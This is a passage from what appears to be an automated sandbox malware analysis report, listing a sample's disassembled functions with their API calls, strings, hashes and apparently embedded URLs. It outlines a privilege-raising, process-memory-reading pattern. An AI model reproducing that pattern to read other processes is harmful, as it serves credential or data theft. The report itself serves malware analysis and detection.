                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$_strncmp$CloseHandleProcess32__wfopen_s$CreateFileFirstMappingNextOpenSleepSnapshotToolhelp32_memset
                                                                                  • String ID: C:\pl.txt$|OK2|$|OK3|$|OK|
                                                                                  • API String ID: 1832730099-1708107098
                                                                                  • Opcode ID: 0746f1af5d49380fe90d5a23a06fc79b504f6a27f359094a156610ff78542980
                                                                                  • Instruction ID: 5b59e82dd0eb23ce4be2ba5ad2493b06ff5f75053cf8c649964d3bf8913015dd
                                                                                  • Opcode Fuzzy Hash: 0746f1af5d49380fe90d5a23a06fc79b504f6a27f359094a156610ff78542980
                                                                                  • Instruction Fuzzy Hash: A2112772A0420467DB10ABB19D85B167BE8AF42255F090472FE18E7250FF71FD25CBD2
                                                                                  Function 6A6D89D0 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • _memset.LIBCMT ref: 6A6D8A1F
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D8A7C
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D8AA4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead_memset
                                                                                  • String ID: 4$5$M$a$c$m$o$x
                                                                                  • API String ID: 3693474235-2915274332
                                                                                  • Opcode ID: 2e27ca2190f7b488038787f0495f90c1d2d8aa9a4c05c1767858546ca61b3dff
                                                                                  • Instruction ID: f8d603b2e5ea9f744581dce9fe347795ae244578e223428fb9d949237c3c9df0
                                                                                  • Opcode Fuzzy Hash: 2e27ca2190f7b488038787f0495f90c1d2d8aa9a4c05c1767858546ca61b3dff
                                                                                  • Instruction Fuzzy Hash: 2A21947150C3C09EC311DB688888A9BBFD49FA9348F080A6DF1986A252D775970DC7BB
                                                                                  Function 0BE97D08 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryclipboardwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 0BE97D20
                                                                                  • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 0BE97D2C
                                                                                  • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 0BE97D3B
                                                                                  • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 0BE97D47
                                                                                  • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0BE97D5F
                                                                                  • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 0BE97D83
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                                                  • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                  • API String ID: 1416857345-3736581797
                                                                                  • Opcode ID: bb6c411bda46169d1985badd9ff040874bba73138b3d75e384e2d86aa3274a64
                                                                                  • Instruction ID: 5d6627fba61ddfbf8189411666c17a51e988683574c7069dc721046d7ff8c2c8
                                                                                  • Opcode Fuzzy Hash: bb6c411bda46169d1985badd9ff040874bba73138b3d75e384e2d86aa3274a64
                                                                                  • Instruction Fuzzy Hash: 2F112E71215305AFEB149F55E841BBAB7A8EF46B50F10A425A8449B240E7B05E5C8BA4
                                                                                  Function 6A6D5BA0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 185fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,6A6D6522), ref: 6A6D5BB5
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,6A6D6522), ref: 6A6D5BC5
                                                                                  • CloseHandle.KERNEL32(00000000,?,6A6D6522), ref: 6A6D5BD3
                                                                                  • _malloc.LIBCMT ref: 6A6D5BE4
                                                                                  • CloseHandle.KERNEL32(00000000,6A6D6522), ref: 6A6D5BF3
                                                                                  • _memset.LIBCMT ref: 6A6D5C07
                                                                                  • ReadFile.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,?,6A6D6522), ref: 6A6D5C1D
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,6A6D6522), ref: 6A6D5C24
                                                                                    • Part of subcall function 6A6FE26F: __lock.LIBCMT ref: 6A6FE28D
                                                                                    • Part of subcall function 6A6FE26F: ___sbh_find_block.LIBCMT ref: 6A6FE298
                                                                                    • Part of subcall function 6A6FE26F: ___sbh_free_block.LIBCMT ref: 6A6FE2A7
                                                                                    • Part of subcall function 6A6FE26F: HeapFree.KERNEL32(00000000,?,6A726890,0000000C,6A705ECE,00000000,6A726C18,0000000C,6A705F08,?,?,?,6A70F988,00000004,6A726F98,0000000C), ref: 6A6FE2D7
                                                                                    • Part of subcall function 6A6FE26F: GetLastError.KERNEL32(?,6A70F988,00000004,6A726F98,0000000C,6A706FD8,?,?,00000000,00000000,00000000,?,6A705835,00000001,00000214), ref: 6A6FE2E8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFileHandle$CreateErrorFreeHeapLastReadSize___sbh_find_block___sbh_free_block__lock_malloc_memset
                                                                                  • String ID: PEC2^O$PEC2fO
                                                                                  • API String ID: 357344292-458899985
                                                                                  • Opcode ID: ef1ee27c0484677a7d4b215a544d6a642afa4a4a7db9379151270a0d67d5ba3a
                                                                                  • Instruction ID: c5024879d500e22d28b2c4c840faccf9d185f3c2d44d130e42c00a0e195077c6
                                                                                  • Opcode Fuzzy Hash: ef1ee27c0484677a7d4b215a544d6a642afa4a4a7db9379151270a0d67d5ba3a
                                                                                  • Instruction Fuzzy Hash: 9C518F3160828017F3212B6488987DA7FA7DF43398F7C446AE4C7EE962EF13E8468355
                                                                                  Function 6A6D5A20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 149fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,6A6D6484), ref: 6A6D5A35
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,6A6D6484), ref: 6A6D5A45
                                                                                  • CloseHandle.KERNEL32(00000000,?,6A6D6484), ref: 6A6D5A53
                                                                                  • _malloc.LIBCMT ref: 6A6D5A64
                                                                                  • CloseHandle.KERNEL32(00000000,6A6D6484), ref: 6A6D5A73
                                                                                  • _memset.LIBCMT ref: 6A6D5A87
                                                                                  • ReadFile.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,?,6A6D6484), ref: 6A6D5A9D
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,6A6D6484), ref: 6A6D5AA4
                                                                                    • Part of subcall function 6A6FE26F: __lock.LIBCMT ref: 6A6FE28D
                                                                                    • Part of subcall function 6A6FE26F: ___sbh_find_block.LIBCMT ref: 6A6FE298
                                                                                    • Part of subcall function 6A6FE26F: ___sbh_free_block.LIBCMT ref: 6A6FE2A7
                                                                                    • Part of subcall function 6A6FE26F: HeapFree.KERNEL32(00000000,?,6A726890,0000000C,6A705ECE,00000000,6A726C18,0000000C,6A705F08,?,?,?,6A70F988,00000004,6A726F98,0000000C), ref: 6A6FE2D7
                                                                                    • Part of subcall function 6A6FE26F: GetLastError.KERNEL32(?,6A70F988,00000004,6A726F98,0000000C,6A706FD8,?,?,00000000,00000000,00000000,?,6A705835,00000001,00000214), ref: 6A6FE2E8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFileHandle$CreateErrorFreeHeapLastReadSize___sbh_find_block___sbh_free_block__lock_malloc_memset
                                                                                  • String ID: PEC2^O$PEC2|O
                                                                                  • API String ID: 357344292-2876750026
                                                                                  • Opcode ID: 9d32ecd72db5961819c13075789ed3bfafd0ff4bdb6e4f5b20a46489736ce900
                                                                                  • Instruction ID: e2daecd919ded55b7cf76c6d74ee2cfad8a6fc3c0d3a94b259020fa911ea0824
                                                                                  • Opcode Fuzzy Hash: 9d32ecd72db5961819c13075789ed3bfafd0ff4bdb6e4f5b20a46489736ce900
                                                                                  • Instruction Fuzzy Hash: 9F41AFB16082441BF3212A608CB57DA7BA7DB033A5F2C4575F586EE9A1EF12E8068391
                                                                                  Function 6A6D7D90 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 121fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,6A6D7EFF,?,?,?,?), ref: 6A6D7DA6
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,?,6A6D7EFF,?,?,?,?), ref: 6A6D7DBD
                                                                                  • CloseHandle.KERNEL32(00000000,?,6A6D7EFF,?,?,?,?), ref: 6A6D7DCE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                  • String ID: Askm2com$www.Askm2.com
                                                                                  • API String ID: 1378416451-731777296
                                                                                  • Opcode ID: d763347d845c739acdb38ddfd8647eaded5093e7031624be816a4a36a96bb018
                                                                                  • Instruction ID: e0ff25e59121e34d00b45afb424ec00e63c0d17bedb18171a61aba25954967f4
                                                                                  • Opcode Fuzzy Hash: d763347d845c739acdb38ddfd8647eaded5093e7031624be816a4a36a96bb018
                                                                                  • Instruction Fuzzy Hash: 993189B26042042BE7006A78FC89BFB77DDDB873BAF140675F802C6191EF529C0946A2
                                                                                  Function 6A6D5920 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 93fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,6A6D64DD), ref: 6A6D5935
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,6A6D64DD), ref: 6A6D5945
                                                                                  • CloseHandle.KERNEL32(00000000,?,6A6D64DD), ref: 6A6D5953
                                                                                  • _malloc.LIBCMT ref: 6A6D5964
                                                                                  • CloseHandle.KERNEL32(00000000,6A6D64DD), ref: 6A6D5973
                                                                                  • _memset.LIBCMT ref: 6A6D5987
                                                                                  • SetFilePointer.KERNEL32(00000000,FFFFF830,00000000,00000002,?,?,?,6A6D64DD), ref: 6A6D5999
                                                                                  • ReadFile.KERNEL32(00000000,00000000,000007D0,?,00000000,?,?,?,6A6D64DD), ref: 6A6D59AD
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,6A6D64DD), ref: 6A6D59B4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseHandle$CreatePointerReadSize_malloc_memset
                                                                                  • String ID: http://www.m6dlq.com/
                                                                                  • API String ID: 1335355966-2465536842
                                                                                  • Opcode ID: 3496ae5ddf7ec99236a363c922ef07b32f94fc7b8c9c64d639014f9ce8e8e93e
                                                                                  • Instruction ID: 83912aa1dc293db878c4769b46c5b2c26238c7fdb744f4cb5314d60ea195d25e
                                                                                  • Opcode Fuzzy Hash: 3496ae5ddf7ec99236a363c922ef07b32f94fc7b8c9c64d639014f9ce8e8e93e
                                                                                  • Instruction Fuzzy Hash: E42168B26083507BF61026749C8FF8A33DEDB01776F284535F606ED4D1EFA4AC068699
                                                                                  Function 6A6D8FC0 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 82COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D906B
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D90A8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead
                                                                                  • String ID: 2$C$G$M$W$a$e$o
                                                                                  • API String ID: 3726627124-81443989
